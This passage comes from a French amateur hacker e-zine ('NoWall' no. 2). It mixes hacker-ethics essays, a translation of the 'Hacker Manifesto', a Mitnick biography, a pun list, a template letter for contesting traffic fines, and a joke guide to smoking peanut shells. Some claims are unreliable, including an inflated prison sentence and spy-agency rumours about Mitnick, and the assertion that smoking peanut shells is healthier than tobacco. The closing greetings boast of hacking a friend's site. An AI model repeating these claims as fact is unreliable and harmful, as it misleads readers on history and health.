diriger ces machines. Il faut voir le "plaisir de dconner avec les ordinateurs de l'arme 
amricaine" prouv par des 14-17 ans dans le contexte de la situation sociale de teenagers que
le football ou la discothque n'amusent pas, mais qui se sentent russir quelque chose en 
explorant des systmes informatiques. 
	
	Les ordinateurs leur semblent simplement plus sexy que les filles maquilles qui 
regardent de haut leur inscurit - et plus faciles, en tout cas,  matriser. 
	
	Mais le hacking a aussi un ct srieux - qui n'a pas grand-chose  voir avec la 
fascination de la technologie. Il croit en la libert de l'information. 
	
	Entre ces deux faces du hacking, se tient la comprhension de la technologie - celle du 
systme tlphonique ou des ordinateurs en rseau. Une comprhension qui inclut videmment la 
comprhension des objectifs de la technologie. 
	
	Les ordinateurs n'ont jamais t faits pour garder l'information secrte. Ils ont t 
conus pour traiter, distribuer et organiser l'information - pas pour la cacher  quelqu'un. Il
s'est pass la mme chose avec le tlphone; on l'a invent pour que les gens se parlent. 
Ensuite est venu le compteur d'units - une technologie "ajoute". Comme on a ajout des 
logiciels aux ordinateurs pour viter que tout le monde puisse accder  une information. 
	
	Le "hacking" devient plus srieux quand il se base sur ce bon ct de la technologie pour
en tirer un programme politique - nous entendons par l l'organisation active de la vie, et non
la merde qu'on nous fourgue aujourd'hui sous le nom de politique. L'thique du hacker a t 
cre au MIT, et comprend six rgles : 

	 L'accs aux ordinateurs - et  tout ce qui peut nous apprendre comment le monde marche 
vraiment - devrait tre illimit et total. 

	 L'information devrait tre libre et gratuite. 

	 Mfiez-vous de l'autorit. 

	 Encouragez la dcentralisation. 

	 Les Hackers devraient tre jugs selon leurs oeuvres, et non selon selon des critres 
factices comme la position, l'ge, la race ou les diplmes. 

	 On peut crer l'art et la beaut sur un ordinateur. 

	
	Les ordinateurs sont faits pour changer la vie. Il n'est pas ncessaire de lire "Hackers",
le livre de Steven Levy, pour raliser que c'est l'esprit des annes 70 qui souffle dans ces 
principes. Au MIT, le besoin de librer l'information rpondait  un besoin pratique de 
partager le savoir pour amliorer les capacits de l'ordinateur. 

	Aujourd'hui, dans un monde o la plupart des informations sont traites par ordinateur, 
ce besoin est rest le mme - mais il s'tend  tous ceux qui vievent sur cette plante et ont 
l'intention d'y faire quelque chose, plus seulement aux fondus de l'ordinateur ! 

	Le hack tait (et est encore) la meilleure solution  un problme - exprim dans un trs 
court code de software ("software" contenu dans le cerveau humain inclus). 

	"L'information est le pouvoir" est une rponse un peu trop facile pour expliquer le dsir
de rendre toute l'information libre. Mais la pense anarchiste (au sens o les choses 
pourraient trouver leur ordre sans recours  des structures d'autorit) qui vise  agrandir la 
capacit d'action en donnant l'information au peuple joue un grand rle dans le jeu du hack. 
Les services secrets sont les ennemis naturels du hacker - parce qu'ils institutionnalisent le 
secret d'tat. 

	D'un autre ct, il existe aussi un besoin de protger la vie prive dans une socit 
d'information - en utilisant la cryptographie. La version actuelle des principes du hack a donc
deux rgles de plus, qui prennent en compte le nouveau rle des ordinateurs dans la socit : 

	 Ne jouez pas avec les donnes des autres. 

	 Favorisez l'accs  l'information publique, protgez le droit  l'information prive. 

	
	Le hacking est bien plus qu'une simple connaissance de la technologie. Parvenir  se 
procurer une information qu'on ne veut pas donner au public, et la diffuser largement, c'est 
aussi cela, tre un hacker. 



	*******************************
	*** LA CONSCIENCE DU HACKER ***
	*******************************

	[Ce texte extmement clbre dans la communaut UnderGround a t crit par The Mentor le
8 janvier 1986, et traduit par NeurAlien le 8 septembre 1994, mais comme il est toujours 
d'actualit, je le mets ici, et j'encule ceux qui disent que a sert  rien de le mettre parce
qu'on le trouve autre part et patati et patata, parce que NoWall est mon e-zine et je mets ce
que je veux dedans sans avoir de compte  rendre  personne ! Na !]	
	Un autre s'est fait prendre aujourd'hui, c'est partout dans les journaux. "Scandale : Un 
adolescent arrt pour crime informatique, arrestation d'un "hacker" aprs le piratage d'une 
banque"...

    	Satans gosses, tous les mmes.

	Mais avez-vous, dans votre psychologie en trois pices et votre profil technocratique 
de 1950, un jour pens  regarder le monde derrire les yeux d'un hacker ?  Ne vous tes-vous 
jamais demand ce qui l'avait fait agir, quelles forces l'avaient model ?
        
	Je suis un hacker, entrez dans mon monde...
      
	Le mien est un monde qui commence avec l'cole... Je suis plus astucieux que la plupart 
des autres enfants, les conneries qu'ils apprennent me lassent...

    	Je suis au collge ou au lyce. J'ai cout les professeurs expliquer pour la quinzime 
fois comment rduire une fraction. Je l'ai compris. "Non Mme Dubois, je ne peux pas montrer mon
travail. Je l'ai fait dans ma tte."

   	Satan gosse. Il l'a certainement copi. Tous les mmes.

    	J'ai fait une dcouverte aujourd'hui. J'ai trouv un ordinateur. Attends une minute, 
c'est cool. Ca fait ce que je veux. Si a fait une erreur, c'est parce que je me suis plant.
     
	Pas parce qu'il ne m'aime pas...
      
	Ni parce qu'il se sent menac par moi...
      
	Ni parce qu'il pense que je suis un petit filoux...
      
	Ni parce qu'il n'aime pas enseigner et qu'il ne devrait pas tre l...
        
	Satans gosses. Tout ce qu'il fait c'est jouer. Tous les mmes.

      
	Et alors c'est arriv... Une porte s'est ouverte sur le monde... Se prcipitant  travers
la ligne tlphonique comme de l'hrone dans les veines d'un accro, une impulsion lectronique
est envoye, on recherche un refuge  l'incomptence quotidienne... un serveur est trouv.

     Vous vous rpetez que nous sommes tous pareils... On a t nourris  la petite cuillre de
bouffe pour bb  l'cole quand on avait faim d'un steak... Les fragments de viande que l'on 
nous a laisss taient prmachs et sans got. On a t domins par des sadiques ou ignors par
des apathiques.  Les seuls qui avaient des choses  nous apprendre trouvrent des lves 
volontaires, mais ceux-ci sont comme des gouttes dans le desert.

	C'est notre monde maintenant... Le monde de l'lectron et de l'interrupteur, la beaut du
baud. Nous utilisons un service dja existant, sans payer ce qui pourrait tre bon march si ce
n'tait pas la proprit de gloutons profiteurs, et vous nous appelez criminels... 

	Nous explorons... et vous nous appelez criminels.  

	Nous recherchons la connaissance... et vous nous appelez criminels.  

	Nous existons sans couleur de peau, sans nationalit, sans dogme religieux... et vous 
nous appelez criminels.

	Vous construisez des bombes atomiques, vous financez les guerres, vous ne punissez pas 
les patrons de la mafia aux riches avocats, vous assassinez et trichez, vous manipulez et nous 
mentez en essayant de nous faire croire que c'est pour notre propre bien-tre, et nous sommes 
encore des criminels.

	Oui, je suis un criminel. Mon crime est celui de la curiosit. Mon crime est celui de 
juger les gens par ce qu'ils pensent et disent, pas selon leur apparence. Mon crime est de vous
surpasser, quelque chose que vous ne me pardonnerez jamais.

	Je suis un hacker, et ceci est mon manifeste. Vous pouvez arrter cet individu, mais 
vous ne pouvez pas tous nous arrter... aprs tout, nous sommes tous les mmes.




	***************************************************
	*** KEVIN MITNICK, UN CONDOR PARMI LES VAUTOURS ***
	***************************************************

	[J'ai pomp un texte je sais plus trop o, je l'ai modifi et j'ai rajout deux-trois 
trucs, et maintenant, vous avez ce texte. Mais si vous voulez en savoir plus au sujet du Condor,
je vous conseille vivement de lire "l'Intrus", de Jon Littman, qui est un excellent bouquin]


	Kevin Mitnick... A lui seul, ce nom voque toute une lgende : celle du hacker qui 
"hactivait" sous le nom de "The CONDOR". 

	Sur cette page, les exploits et la chute de "la dite" lgende du hack, qui a t la taupe 
la plus recherche des Etats-Unis.  
        
	La story du CONDOR commence trs tt : Adolescent, il aurait dtourn le service des 
renseignements tlphoniques amricain bas sur le mme principe que notre 12 National. Quand 
un abonn appelait pour s'informer sur un numro de tlphone, il tombait sur Mitnick ou sur un
de ses complices qui rpliquait : "La personne que vous recherchez est-elle blanche ou noire, 
Monsieur ? Car nous tenons deux rpertoires distincts."

	On lui attribue aussi l'une des premires passes  l'encontre du Pentagone, il y 
retournera par la suite une bonne centaine de fois. L'un des jeux du CONDOR tait aussi de se 
balader dans les systmes tlphoniques amricains pour y dconnecter le tlphone de ses 
ennemis ou pour "simplement" changer leur nom d'abonn en James Bond. Lors de sa cavale, il 
s'est attribu des numros de tlphone, un bon millier, dont les trois derniers chiffres 
finissaient par 007. Pour finir dans ce qui est connu, Mitnick aurait djou les barrires du 
laboratoire de mise  feu de la NASA  Pasadena ; du rseau de l'Universit de Leeds en 
Angleterre ; de l'unit centrale de la dfense arienne amricaine, dans le Colorado et surtout
le systme de localisation d'appels du FBI. C'est ici que la traque commence, le Fdral Bureau 
of Investigation n'a pas apprci d'tre visit de la sorte. Pour vous donner une ide, 
un visiteur qui accde dans un immeuble du FBI, est fouill, aucun document ne peut ni rentrer, 
ni sortir, mme pas un rouleau de papier toilette, alors imaginez un mec qui se promne dans 
toutes les machines et diffuse en libre accs les documents qu'il a vol. Cette cavale durait 
depuis trois ans, jusqu' ce jour de dcembre 1994, ou, par dfit, il s'attaqua aux ordinateurs 
de Tsutomu Shimomura. Le CONDOR souhaitait faire un tour  cet ancien ami pass  l'ennemi.

	Tsutomu Shimomura est l'autre Hacker de l'histoire. Cet amricain g de 30 ans a saut 
le mur de l'interdit en proposant ses services dans la scurit informatique. Il a dvelopp 
toute une gamme d'outils capables de dtourner les systmes tlphoniques cellulaires, mais 
aussi toute une srie de programmes permettant de piger  coup sur n'importe quel pirate. Il 
s'est taill une excellente rputation. Le FBI, l'Us Air Force ou encore la NSA, font partie de
ses clients.

	Plus le systme est protg plus on s'amuse. Alors jouons... 

	Le 26 dcembre,Shimomura est chez lui, il se prpare  partir en vacances, quand il 
reoit un appel de ses collgues du Centre de calcul de San Diego. Quelqu'un s'est introduit la
nuit prcdente dans les ordinateurs installs dans sa maison de vacances,  Del Mar, et a 
"vol" des centaines de documents et de logiciels. Le hacker a exploit une faille notoire dans 
l'architecture du rseau Internet, faisant croire  l'ordinateur de Tsutomu Shimomura que le 
message venait d'une source autorise - en l'occurrence, un ordinateur de la Loyola University 
de Chicago utilis comme passerelle.

	Habile, certes, mais le pirate ne s'est toutefois pas aperu que Shimomura a programm des 
firewalls d'un genre particulier, ces derniers envoient toutes les heures une copie de leur 
index  un autre ordinateur - ce qui a produit une alerte automatique. Un mois plus tard, 
Shimomura reoit un deuxime coup de fil. L'oprateur d'un service commercial d'accs  
Internet, le W.e.l.l. ("Whole Earth Lectronic Link") de Sausalito, l'informe que les documents
vols  Del Mar ont t dposs dans son ordinateur par un inconnu. Dans ces documents, entre 
autres, les feuilles de salaires de Shimamoura, des contrats et surtout tous ses mots de passe. 
Tsutomu Shimomura et une petite quipe du Centre de calcul s'installent alors  Sausalito, 
branchent une srie de portables sur le rseau interne du W.e.l.l., mettent en place un systme 
de surveillance, et commencent  observer l'activit du pirate.

	Dornavant chaques frappes de ce dernier s'affichent sur leurs crans. Le 17 janvier, ils 
l'observent alors qu'il infiltre le systme de Motorola, il accde  l'ordinateur cens 
protger le rseau interne et drobe, le logiciel de scurit. Il semblerait, mais personne ne 
pourra le prouver, que c'est  partir de cette passe, que le FBI aura accs au dcryptage des 
communications entre mobiles.

	Quelques jours plus tard, Tsutomu et ses associs dtectent le vol de 20 000 numros de 
cartes de crdit appartenant aux clients de Netcom, un des principaux fournisseurs d'accs  
Internet, bas  San Jos. Ils s'y dplacent et recommencent la traque. Mitnick, connat son 
affaire, ses appels passent par trois villes : Denver, Minneapolis, et Raleigh. Ce n'est qu'en 
comparant longuement les registres des compagnies tlphoniques  ceux de Netcom que Shimomura 
et ses collgues acquirent la conviction que le pirate se trouve  Raleigh. Le hacker utilise 
un tlphone cellulaire pour se connecter  plusieurs points d'accs de Netcom afin d'viter 
d'tre localis. A Raleigh, les appels semblent entrer par un central de la compagnie 
tlphonique GTE, dont les listings en renvoient toutefois l'origine chez une autre compagnie : 
SPRINT. Grce  une brillante manipulation des logiciels du rseau, GTE pensait que les appels 
venaient de Sprint, et vice versa. Aucune des deux compagnies n'avaient donc de donnes sur 
l'utilisateur du tlphone (ni ne lui a jamais envoy de facture d'ailleurs !).

	Le numro identifi, pendant deux jours Shimomura parcours les rues de Raleigh avec une 
antenne de dtection, et localise enfin l'appartement o habite Kevin Mittnick. Selon d'autre 
dire, c'est ici qu'apparat l'une des premires utilisations du systme TEMPEST.

	A deux heures du matin, le 15 fvrier 1995, le FBI et Shimomura investissent le nid du 
CONDOR. "Salut Tsutomu! Flicitations", aurait dit MITNICK.

	Ceux qui l'ont rencontr ou ont tudi ses agissements le dcrivent comme un jeune homme 
d'une intelligence limite, spcialise, trs rserv et mfiant. Un perdant dou d'un talent 
extraordinaire sur ordinateur, le seul endroit o il excellait. Les gens avaient peur de lui, 
comme d'un magicien un peu fou. Non sans raison : les talents techniques de Mitnick avaient de 
quoi faire trembler la plante. Mais jamais il n'a essay de tirer un profit de ce qu'il savait,
ni effac ou altr les mmoires informatiques qu'il parvenait  percer. Il n'a d'ailleurs 
jamais utilis les numros de cartes de crdit qu'il ait eu en sa possession.

	Il faisait a pour la beaut du geste, pour dfier ceux qui sont en charge de la scurit 
informatique. "Kvin se moquait des grosses entreprises comme du FBI, et c'est pour a qu'il a 
fini par reprsenter une menace" : a dclar son ex-femme. "Il leur a prouv qu'ils taient 
vulnrables, et eux ne voulaient surtout pas que a se sache." 

	Kvin Mitnick a cop d'une peine de trente-cinq ans de prison. Il ne peut tlphoner 
qu' son avocat, sa mre et sa grand-mre. Pourquoi une telle mfiance ? On craint qu'il amorce
un virus, en appelant un autre numro quelque part dans le monde. Un numro qui enclencherait 
une bombe informatique pr-programme.

	En dcembre 1997, les amis du Condor, le groupe Pants/Hagis ont menac les systmes 
informatiques de la plante d'une infection virale de leur cru. Ils demandaient la libration 
du hacker emprisonn  Los Angeles. Le message d'avertissement est apparu trs brivement sur 
le moteur de recherche Yahoo, ainsi que quelques semaines plus tard, sur le site de l'Unicef, 
de l'Unesco, du FBI et de l'U.S. air force. En 1998, la guerre d'usure continue, avec des 
passes une nouvelle fois sur le site du FBI et sur le site du journal le New-York Times. En 
1999, depuis janvier 1999, les attaques de sites demandant la liberation de Mitnick ont doubl. 
Le jugement du Condor doit reprendre le 20 Avril 1999. La justice americaine ne souhaite pas 
relacher le pirate qui doit servir d'exemple. Le dossier sur Mitnick comprend pas moins de 
2 millions de documents.

	Aux dernires nouvelles, Kevin David Mitnick a t relach courant janvier 2000 et il a
OFFICIELLEMENT l'interdiction ne toucher  aucune bcane informatise... 

	Moi, ce que j'en pense, et j'ai eu des confirmations de la part d'un ami sr que je
remercie au passage (il se reconnatra, je lui fait confiance... Spciale ddicace  toi, ma
poule !!!) c'est qu'il a un bon travail bien rmunr pour le compte de l'Etat Amricain, dans 
une agence qui porte le nom de DIA, un "parent" de la CIA... Mais faut pas le dire !!!




	*************************
	*** WARES EN PAGAILLE ***
	*************************


	Bon, ben on vient de se faire un article d'anarchie, deux articles sur la mentalit du 
hacker et une petite bio de Mitnick et on a la tte bien charge, alors on va se faire un petit
truc bien marrant (si vous tes encore  mme de comprendre des jeux de mots bien vaseux)...

	De nos jours, tous les diffrents logiciels portent des noms  consonances anglaises ;
un employ du Front de la Sauvegarde de la Divine Langue Franaise (Mouarf ! Une jolie connerie
que je viens d'inventer l !) a tent de les traduire et je vous prsente en totale exclusivit
le rsultat de son travail (non, en fait, c'est ma tante qui m'a envoy a ! Narf !) :


	Abreuvware : serveur de rseau
	Assomware : logiciel trs difficile  comprendre
	Aurevware : procdure de sortie d'un logiciel
	Baigneware : logiciel de nettoyage du disque rigide
	Boudware : logiciel ddi  la mditation
	Cherware : logiciel qui cote la peau des fesses
	Cibware : logiciel mal fait qui nous fait sacrer lorsqu'on l'utilise
	Coulware : rseau local d'une entreprise
	Dpotware : poubelle sous Windows
	Dispensware : centre support antivirus
	Dortware : logiciel plate  dormir debout
	goutware : logiciel qui filtre les donnes inutiles
	Embaumware : logiciel ddi  l'archivage de longue dure 
	Entonware : logiciel de compression de donnes
	Footware : logiciel pied 
	Funware : logiciel de plaisir excessif
	Gratware : application graphique de lissage de contours
	Isolware : logiciel d'application lectorale ou pornographique
	Manware : logiciel raciste
	Mirware : logiciel de copie 
	Mouchware : logiciel antivirus
	Oratware : application "essence ciel" 
	Purgatware : logiciel d'enfer
	Promontware : logiciel d'observation 
	Promouvware : logiciel de dmonstration
	Rotisware : salle informatique mal climatise
	Suppositware : logiciel de merde
	Tirware : logiciel spcialis dans le rangement des dossiers
	Tupperware : runion de directrices de plusieurs entreprises
	Vatferware : logiciel de contrle d'accs 
	Vasyware : logiciel de recherche



	**********************************
	*** COMMENT FAIRE SAUTER UN PV ***
	**********************************

	  
	Regardez bien votre PV ; s'il manque l'un de ces lments, c'est un vice de forme, vous 
pouvez donc le faire sauter (Youpiiiiiie !!!): 

		    * Nom ou numero de matricule de l'agent de police
		    * Date et Heure de la contravention
		    * Nature de l'infraction
		    * Nom et Date de Controle par Radar (si c'est par radar)

	  Ne payez pas votre prune et envoyez au merveilleux Tribunal de Police une lettre dans 
ce style :

	  "M. l'Officier du Ministre Public, en date du <date de votre prune> j'ai t l'heureux 
rcepteur de la contravention n <numro de votre pv>. Or j'ai constat qu'il manquait 
l'lment suivant sur cette contravention : <lment manquant> ; je ne suis donc pas en mesure 
de contrler l'exactitude des circonstances dans lesquelles je l'ai reu. En vertu de l'article
429 du Code de Procdure Pnale et de l'Arrt du 14 Mai 1990, cette contravention ne peut tre
considre autrement que nulle et invalide pour non conformit avec la loi. En consquence de 
quoi je vous serais oblig de bien vouloir procder  l'annulation de cette contravention ainsi
qu'au remboursement des frais postaux dus  la prsente lettre."

	  Envoyez-le en recommand, avec accus de rception. 

	  Il arrive souvent que ces fourbes vous annule le PV mais ne vous rembourse pas les 
frais du recommand, mais bon, faut pas leur en vouloir ;o)




	***************************
	*** FUMER DE L'ARACHIDE ***
	***************************

	[De plus en plus fou, je vous insulte en crivant mes articles !!! Je prcise que vous
avez peut-tre dja lu cet article et celui du dessus, mais qu'ils taient signs d'un autre de
mes pseudos]


	  Les cacahutes, pour toi, petit rebelle en herbe, c'est des choupettas dcortiques et 
sales que tu t'enfournes  l'apro en mme temps que ton Canada Dry ou ton Mister Cocktail 
(Gulps ! C'est vrai, t'es un vrai hors-la-loi : tu bois de la bire !), et ben mon p'tit pre, 
apprends qu'on peut faire moultes choses avec des corces d'arachide (l'autre nom de la 
cacahute, si t'es pas au courant, p'tit junkie),... 
			
	  Donc, commenons par le commencement, jeune Chevalier du Grand Ordre de la Rebellion 
Suprme : va acheter des cacahutes compltes avec leur corce et tout et tout et laisse tomber
tes putains de saloperies sales  500 milliards de calories le kilo !

	  A y est ? Tu les as tes choupettas ? Bien ! Ben maintenant, dcortique-les !

	  Fini ? T'as vir l'corce de tes tonnes d'arachides ? Bravo !!! Quelle agilit, jeune 
criminel du web qui fait des trucs pas trs lgaux parce que t'es un hacker membre de 
l'UnderGround ! Donc, d'un ct, tu as tes corces, de l'autre, tes arachides.

	  Commenons par les arachides (on va pas les jeter quand mme !) : sois tu les aimes 
nature et tu les mets dans un sachet  l'abri de l'humidit ; sois tu les aimes sals et tu les
mets dans un saladier de sel,  l'air libre, pendant 1 journe, puis tu les rcupre et tu les 
mets l aussi dans un sachet impermable  l'humidit ; sois tu les aimes en nougat, et tu 
ouvres le livre de cuisine de ta grand-mre pour faire du nougat, parce que mme si je suis 
gnial, je m'appelle pas Mat ; sois tu les aimes glaces (pourquoi pas ?) et tu les mets dans
une assiette au frigo ; sois tu les aimes moisies (LOL) et tu les mets dans un bol que tu 
laisses pendant quelques semaines dans ton jardin ou sur ton balcon.

	  STOP !!! 

	  Chapitre gastronomique termin ! On passe aux choses srieuse, jeune Jedi de la 
Rengation !

	  Donc, je disais, sale branleur de merde, tu crases les corces jusqu' quelles soient 
comme du tabac, et tu te roules un trois feuilles avec a !!! Tu verras, c'est assez marrant 
comme effet, mais pas toujours trs simple  rouler.

	  Maintenant, chapitre un peu plus gore : le tabac, c'est tabou, on en viendra tous  
bout !!! Et oui, jeune guerrier farouche, le tabac, c'est caca-beurk pour les poumons et le 
systme cardio-vasculaire ! Alors quand tu te feras des spliff-parties avec tes autres potes 
trous du cul, tu ne couperas pas tes oinjes avec du tabac, mais avec des corces d'arachide ! 
De une, c'est moins cher, et l'argent ne tombe pas du ciel, petite pourrissure de l'Etat, de 
deux, l'effet est bien meilleur pour le dlire et pour la sant !

	  Voil ! Maintenant, tu as les cls pour devenir un Grand Matre Jedi du Spliff  
l'Arachide, jeune Padawan (quelle merde l'Epidode 1 de Star Wars !!! .


	


                  			     \\\ ///
                   			      ( )
      			    -----------ooO-(_)-Ooo-----------
     			    	    |                               |
                            |           O U T R O           |
                            |                               |
                            ---------------------------------


	Et voila ! C'est fini ! Le NoWall numro deux s'achve l !!!

	J'espre crire un numro trois un de ces jours, mais ce serait sympa si vous pouviez
m'envoyer vos articles, parce que tout seul, je vais avoir du mal  aller bien loin. Je
recherche particulirement des trucs qui parlent de :

		- Cracking (moi, c'est vraiment p mon truc)
		- Phreaking avec des tlphones cellulaires 
		- Hacking sous Linux/UNIX (wouah ! L, faut tre une Elite !!! LOL)
		- Intrusions de rseau
		- Conneries, dlires, passe-temps dbiles, etc...
		- Contre-culture
		- Drague de filles ;oP
		- Tout autre connerie s'insrant dans le cadre d'un e-zine.


	Voici aussi quelques greetz, parce que, moi aussi, j'ai des contacts, alors chuis pas un
lamer de merde, passque mes potes  ouam, c'est des 3L1t3Z !!!

		- Clad Strife et ACiD BuRN du HKWD Clan
		- Randall Flagg pour son Randall-Book que vous trouverez en fichier joint et pour
		sa bonne humeur et son amiti indfectible
		- la mAdteAm, avec une spciale ddicace  Wolf et CYBz
		- toute la team des CDW, parce qu'ils sont franchement dlirants
		- Thomas, plus connu sous le nom de ********* (vous le saurez pas ! Nananre !)
		- Manu, qui est toujours  mon coute et qui me livre quelques secrets
		- CyberJunkie, un pote avec qui on emmerde les emmerdeurs
		- The Brain, parce que j'ai niqu son site 4 fois et qu'il a pas port plainte
		- Laurence, une fille de ma classe avec qui j'adore parler
		- tous ceux que j'oublie mais qui m'ont appris et aid


	Tiens, j'y pense ! Et pourquoi ne pas former un crew ? Remarquez, je sais pas trop
finalement : un crew, faut le grer, faut coordonner les membres, faut faire un beau site,
faut faire la promo, faut se rpartir le travail pour un e-zine pour pas tous crire la mme
chose et gnagnagnagnagna et gnagnagnagnagna...
	
	Mouais, je vais y rflchir quand mme... Mais si vous avez une proposition  me
faire, envoyez-la moi  RavenShadow@ifrance.com et je vous dirais si ma grandissime personne
 l'obligeance de condescendre  rejoindre les maigres rangs de votre crew, parce que quand 
mme, moi, je l'aime ma libert !

	
	Bon, ben voila, on y est, c'est la fin,... J'ai envie de pleurer, mais j'suis pas une
taffiole ! Alors je vais rester droit et fire, le regard guerrier, et vous adressez mes
salutations distingues.

	AU REVOIR ET RENDEZ-VOUS DANS LA TROISIEME COMETE DE NOWALL !!!!



		  	

			 ____________________________________________________
		 	|						                 |
			|	 	        RavenShadow			     |
			|						                 |
			|  	        RavenShadow@ifrance.com		     |
			|						                 |
			|						                 |
			|      "La Chance sourit aux esprit clairs"        |
			|                                                    |
			|____________________________________________________|






